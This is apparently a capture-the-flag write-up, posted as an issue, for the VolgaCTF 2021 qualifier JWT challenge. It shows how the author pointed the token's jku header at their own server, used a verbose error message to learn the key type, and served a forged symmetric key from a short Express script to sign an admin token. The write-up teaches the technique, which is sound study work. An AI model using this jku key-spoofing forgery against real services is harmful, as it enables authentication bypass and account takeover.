VolgaCTF 2021 Qualifier - JWT
aszx87410 opened this issue · comments
JWT
Description
Writeup
After register and login we will have a JWT, and we need to be admin to get the flag.
This is how JWT looks like:
At first, I found that I can replace jku to my own server, so I implemented a simple server to return the key. Unfortunately, it keeps return error which said that it can not find a suitable key. I stuck here for a long time and have no idea how to proceed.
Then, I noticed a very important part in the error message, part of jwk are included in the response. So I tried to change the JWT kid to another random string, here is the error message from server:
JWT processing failed. Additional details: [[17] Unable to process JOSE object (cause: org.jose4j.lang.UnresolvableKeyException: Unable to find a suitable verification key for JWS w/ header {"kid":"HS2561","alg":"HS256"} from JWKs [org.jose4j.jwk.OctetSequenceJsonWebKey{kty=oct, kid=HS256, alg=HS256}] obtained from http://localhost:8080/secret): JsonWebSignature{"kid":"HS2561","alg":"HS256"}->eyJraWQiOiJIUzI1NjEiLCJhbGciOiJIUzI1NiJ9.eyJqa3UiOiJodHRwOi8vbG9jYWxob3N0OjgwODAvc2VjcmV0IiwiZXhwIjoxNjE3NTMwOTkyLCJqdGkiOiJCREFjSTZ1V0p5X0tvdmhTWnN6WW5nIiwiaWF0IjoxNjE2OTI2MTkyLCJuYmYiOjE2MTY5MjYwNzIsInN1YiI6ImV3ZWlvZmpld29pZiJ9.G_4j1QH9RoiSkv59rmZz0gtNFKPath-Bi8J4_dQmevo]
Great! Now we know the kty is oct, no wonder kty=RSA keeps throw error.
Now we know the correct kty so we can create our own jwk server:
const express = require('express')
const app = express()
app.get('/', (req, res) => {
res.json({
"kty": "oct",
"kid": "HS256",
"alg": "HS256",
"k": "AyM1SysPpbyDfgZld3umj1qzKObwVMkoqQ-EstJQLr_T-1qS0gZH75aKtMN3Yj0iPS4hcgUuTwjAzZr1Z9CAow"
})
})
app.listen(3000)We can sign a new JWT with sub=admin by using this secret key, and get the flag.
reference: